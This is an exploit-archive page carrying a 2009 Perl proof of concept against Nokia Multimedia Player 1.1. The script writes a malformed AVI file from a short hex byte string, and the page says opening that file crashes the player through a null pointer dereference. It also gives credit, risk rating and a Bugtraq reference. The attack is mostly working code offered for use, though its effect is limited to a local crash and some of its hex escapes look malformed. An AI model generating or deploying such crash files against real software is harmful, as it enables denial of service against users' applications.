Nokia Multimedia Player (.AVI File) Null Dereference Pointer Exploit

2009.01.28
Credit: alphanix00
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

#!/usr/local/bin/perl # # Application : Nokia Multimedia Player # Version : v 1.1 # Bug : Local (.AVI File) Null Dereference Pointer Exploit # Exploit Method : Local # Author : Null Area Security # Zigma [zigmatn @ gmail.com] # IRC : irc://irc.nullarea.org/#nullarea # Home : http://NullArea.NET # # Description : Opening a malformed .AVI file with Nokia Multimedia Player version 1.1 causes it to point to Null Pointer [00000000] which leads to crash the application . # # " Access violation when reading [00000000] - " # $area = "ndpe.avi"; $null = "\x4A\x75\x73\x74\x00\x41\x6E\x79\x74\x68\x69\6E\x76\x00". "\x54\x75\x6E\x96\73\x69\x61\x00\x52\x75\x6C\x6C\x7A\x7A"; print "\nFuzzing Nokia Multimedia Player v 1.1\r"; print "\n\n[+] Evil file to make : $area ...\r\n"; sleep(2); open(avi, ">./$area") || die "\nCannot open $area: $!"; print avi "$null"; close (avi); print "\n[+] File $area successfully created!\r\n";

References:

http://seclists.org/bugtraq/2009/Jan/0229.html


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top